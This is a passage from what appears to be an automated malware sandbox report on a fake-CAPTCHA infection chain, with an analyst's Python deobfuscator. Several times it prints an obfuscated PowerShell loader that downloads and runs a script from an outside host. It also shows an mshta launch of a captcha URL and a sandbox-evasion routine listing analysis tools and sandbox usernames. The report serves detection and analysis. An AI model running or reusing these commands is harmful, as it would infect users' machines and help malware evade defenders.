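    "{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]"
    "::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';"
    "[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object"
    "{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()"
)

# Get-Member output for the types the loader reflects over. Assumption: these
# tables are reproduced from a Windows PowerShell 5.1 session, not from the
# report. Get-Member sorts by member-type name, then member name, which is what
# makes the hard-coded index [6] land on the same property on every host.
ENGINE_INTRINSICS_MEMBERS = [
    "Equals", "GetHashCode", "GetType", "ToString",       # Method
    "Events", "Host", "InvokeCommand", "SessionState",   # Property
]
INVOKE_COMMAND_MEMBERS = [  # CommandInvocationIntrinsics methods, then properties
    "Equals", "ExpandString", "GetCmdlet", "GetCmdletByTypeName", "GetCmdlets",
    "GetCommand", "GetCommandName", "GetCommands", "GetHashCode", "GetType",
    "InvokeScript", "NewScriptBlock", "ToString",
    "CommandNotFoundAction", "HasErrors", "LocationChangedAction",
    "PostCommandLookupAction", "PreCommandLookupAction",
]
WEBCLIENT_MEMBERS = [  # System.Net.WebClient members relevant to the '*nl*g' lookup
    "DownloadData", "DownloadFile", "DownloadString", "DownloadStringAsync",
    "DownloadStringTaskAsync", "OpenRead", "UploadString", "UploadValues",
    "BaseAddress", "Headers", "Proxy", "UseDefaultCredentials",
]
# Constructed stand-in for what GetCommandName('N*-O*', $TRUE, $TRUE) sees on
# the victim; on a real host every visible command is a candidate.
VISIBLE_COMMANDS = ["Get-Member", "Get-PSDrive", "Invoke-Expression", "New-Item",
                    "New-Object", "Set-Item", "Set-Variable"]


def ps_like(name: str, pattern: str) -> bool:
    """PowerShell -like: case-insensitive, whole-string, * and ? wildcards."""
    return fnmatch.fnmatchcase(name.lower(), pattern.lower())


def resolve_unique(members, pattern: str) -> str:
    """Replay `| Where-Object {$_.Name -like <pattern>}` and insist on one hit.
    The loader depends on uniqueness: two hits would hand PowerShell an array
    where a single member name is expected, and the chain would break."""
    hits = [m for m in members if ps_like(m, pattern)]
    if len(hits) != 1:
        raise ValueError(f"pattern {pattern!r} is ambiguous or dead: {hits}")
    return hits[0]


def stage1_hex_tokens(blob: str) -> list:
    """FRsZn from the first stage: -split ($s -replace '..', '0x$& ')."""
    return re.sub(r"..", lambda m: "0x" + m.group(0) + " ", blob).split()


def stage1_bytes(blob: str) -> bytes:
    """The byte values those tokens become once PowerShell casts them."""
    return bytes(int(tok, 16) for tok in stage1_hex_tokens(blob))


def deobfuscate_stage2(cmdline: str = STAGE2_CMDLINE) -> dict:
    """Pull the index, the -like patterns and the URL out of the command line,
    resolve each lookup in nesting order and rebuild the plain-text equivalent."""
    idx = int(re.search(r"\|Member\)\[(\d+)\]\.Name", cmdline).group(1))
    patterns = re.findall(r"-like'([^']+)'", cmdline)  # source order = nesting order
    cmd_pattern = re.search(r"\.Invoke\('([^']+)',\$TRUE,\$TRUE\)", cmdline).group(1)
    url = re.search(r"Variable:/lW '([^']+)'", cmdline).group(1)
    if len(patterns) != 3:
        raise ValueError(f"expected three -like lookups, found {patterns}")
    root = ENGINE_INTRINSICS_MEMBERS[idx]                             # InvokeCommand
    get_command = resolve_unique(INVOKE_COMMAND_MEMBERS, patterns[0])  # GetCommand
    get_command_name = resolve_unique(INVOKE_COMMAND_MEMBERS, patterns[1])
    cmdlet = resolve_unique(VISIBLE_COMMANDS, cmd_pattern)            # New-Object
    download = resolve_unique(WEBCLIENT_MEMBERS, patterns[2])         # DownloadString
    plain = (f"$CiU = {cmdlet} Net.WebClient; "
             f"[ScriptBlock]::Create($CiU.{download}('{url}')).InvokeReturnAsIs()")
    return {"root": root, "get_command": get_command,
            "get_command_name": get_command_name, "cmdlet": cmdlet,
            "download": download, "url": url, "plain": plain}


if __name__ == "__main__":
    for key, value in deobfuscate_stage2().items():
        print(f"{key:17} {value}")
```

Resolved, the second stage is `$CiU = New-Object Net.WebClient` followed by `[ScriptBlock]::Create($CiU.DownloadString('https://deduhko.klipzyroloo.shop/mazkk.eml')).InvokeReturnAsIs()`, a plain download-and-execute; `$ExecutionContext.InvokeCommand.GetCommandName('N*-O*',...)` and `GetCommand(..., Cmdlet)` exist only to obtain a CommandInfo for New-Object without writing its name. None of those tokens appear in the recorded command line, so string matches keyed on them miss it; what remains visible are the `-w hidden -ep bypass -nop` parameters and the mshta.exe to powershell.exe to SysWOW64 powershell.exe ancestry in the two process-creation entries above.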
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_0076C0FB pushfd ; iretd 6_2_0076C109
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_0076C0D0 pushad ; iretd 6_2_0076C0F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_0076A343 push esp; retf 6_2_0076A321
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_0076A313 push esp; retf 6_2_0076A321
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00769543 pushfd ; iretd 6_2_0076954A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00769A50 push A9F807D0h; iretd 6_2_00769A5E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00769AD1 push A9E007D0h; iretd 6_2_00769AFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00769B20 push AA0807D0h; iretd 6_2_00769C06
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00769B11 push A7A807D0h; iretd 6_2_00769B1E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_06F316A0 pushad ; iretd 6_2_06F31D39
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_06F32480 push edx; iretd 6_2_06F32586
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_06F34400 push eax; iretd 6_2_06F34636
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_06F3416D push ebx; iretd 6_2_06F3417E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_06F31E55 pushad ; iretd 6_2_06F31E6A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (75 identical entries)
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX (27 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AUTORUNSC.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: REGMON.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AUTORUNS.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IEX-QZZD%B(_DYT~PDTXBK3F.JQ86R1ZW(PE5IEJN@OUOSH1@NC/A-;GAXYC/M75H"SV)VUU91}C#2H\KQ;J4LFM0WRYK:GO\/L*{IX37351521863506478298354615FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -WINDOWSTYLE HIDDEN -ARGUMENTLIST '-W','HIDDEN','-EP','BYPASS','-NOP','-COMMAND','GDR -*;SET-VARIABLE CIU (.$EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME)|MEMBER|WHERE-OBJECT{$_.NAME-LIKE''*T*OM*D''}).NAME).INVOKE($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).PSOBJECT.METHODS|WHERE-OBJECT{$_.NAME-LIKE''*OM*E''}).NAME).INVOKE(''N*-O*'',$TRUE,$TRUE),[MANAGEMENT.AUTOMATION.COMMANDTYPES]::CMDLET)NET.WEBCLIENT);SET-ITEM VARIABLE:/LW ''HTTPS://DEDUHKO.KLIPZYROLOO.SHOP/MAZKK.EML'';[SCRIPTBLOCK]::CREATE((GI VARIABLE:CIU).VALUE.((((GI 
VARIABLE:CIU).VALUE|MEMBER)|WHERE-OBJECT{$_.NAME-LIKE''*NL*G''}).NAME).INVOKE((VARIABLE LW).VALUE)).INVOKERETURNASIS()';$XVHU = $ENV:APPDATA;FUNCTION RGRUS($KTGA, $XIIU){[IO.FILE]::WRITEALLBYTES($XIIU, (NEW-OBJECT (CQTEX $IONU.SUBSTRING(103,26))).DOWNLOADDATA($KTGA))};FUNCTION CQTEX($JWDQL){RETURN (($JWDQL -SPLIT '(?<=\G..)'|%{$IONU.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION JWDQL(){FUNCTION WEQQ($OXSST){IF(!(TEST-PATH -PATH $XIIU)){RGRUS (CQTEX $OXSST) $XIIU}}}JWDQL;P
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PETOOLS.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINDUMP.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -WINDOWSTYLE HIDDEN -ARGUMENTLIST '-W','HIDDEN','-EP','BYPASS','-NOP','-COMMAND','GDR -*;SET-VARIABLE CIU (.$EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME)|MEMBER|WHERE-OBJECT{$_.NAME-LIKE''*T*OM*D''}).NAME).INVOKE($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).PSOBJECT.METHODS|WHERE-OBJECT{$_.NAME-LIKE''*OM*E''}).NAME).INVOKE(''N*-O*'',$TRUE,$TRUE),[MANAGEMENT.AUTOMATION.COMMANDTYPES]::CMDLET)NET.WEBCLIENT);SET-ITEM VARIABLE:/LW ''HTTPS://DEDUHKO.KLIPZYROLOO.SHOP/MAZKK.EML'';[SCRIPTBLOCK]::CREATE((GI VARIABLE:CIU).VALUE.((((GI VARIABLE:CIU).VALUE|MEMBER)|WHERE-OBJECT{$_.NAME-LIKE''*NL*G''}).NAME).INVOKE((VARIABLE LW).VALUE)).INVOKERETURNASIS()';$XVHU = $ENV:APPDATA;FUNCTION RGRUS($KTGA, 
$XIIU){[IO.FILE]::WRITEALLBYTES($XIIU, (NEW-OBJECT (CQTEX $IONU.SUBSTRING(103,26))).DOWNLOADDATA($KTGA))};FUNCTION CQTEX($JWDQL){RETURN (($JWDQL -SPLIT '(?<=\G..)'|%{$IONU.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION JWDQL(){FUNCTION WEQQ($OXSST){IF(!(TEST-PATH -PATH $XIIU)){RGRUS (CQTEX $OXSST) $XIIU}}}JWDQL;8
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IDAQ.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FILEMON.EXE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2192
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1019
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5326
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4179
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6387
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3386
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7740 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884 Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: powershell.exe, 00000004.00000002.1866121722.000001E5F23A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000004.00000002.1860583581.000001E5F1D3C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
Source: mshta.exe, 00000002.00000002.1893827664.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878800373.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW .N
Source: mshta.exe, 00000002.00000003.1878800373.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893916483.000001F01B51C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1874624534.000001F01B51C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893827664.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1885827801.000001F01B51C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2901407465.000002627585F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2900434942.000002627042B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1858155498.000001E5F1A11000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.1866121722.000001E5F23A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\-90VO
Source: mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_@>q
Source: powershell.exe, 00000006.00000002.2214673362.0000000006CA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn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
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function frszn($zlkrb){return -split ($zlkrb -replace '..', '0x$& ')};$vuqbu = frszn('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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command gdr -*;set-variable ciu (.$executioncontext.(($executioncontext|member)[6].name).(($executioncontext.(($executioncontext|member)[6].name)|member|where-object{$_.name-like'*t*om*d'}).name).invoke($executioncontext.(($executioncontext|member)[6].name).(($executioncontext.(($executioncontext|member)[6].name).psobject.methods|where-object{$_.name-like'*om*e'}).name).invoke('n*-o*',$true,$true),[management.automation.commandtypes]::cmdlet)net.webclient);set-item variable:/lw 'https://deduhko.klipzyroloo.shop/mazkk.eml';[scriptblock]::create((gi variable:ciu).value.((((gi variable:ciu).value|member)|where-object{$_.name-like'*nl*g'}).name).invoke((variable lw).value)).invokereturnasis()
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OllyDbg.exe
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tcpview.exe
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Wireshark.exe
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: lordpe.exe
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: procexp.exe
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Procmon.exe
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autoruns.exe
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: regmon.exe
Mitre Att&ck Matrix (one column per tactic; a leading number is the count of matched signatures for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 Windows Management Instrumentation; 22 Command and Scripting Interpreter; 2 PowerShell; Cron; Launchd; Scheduled Task
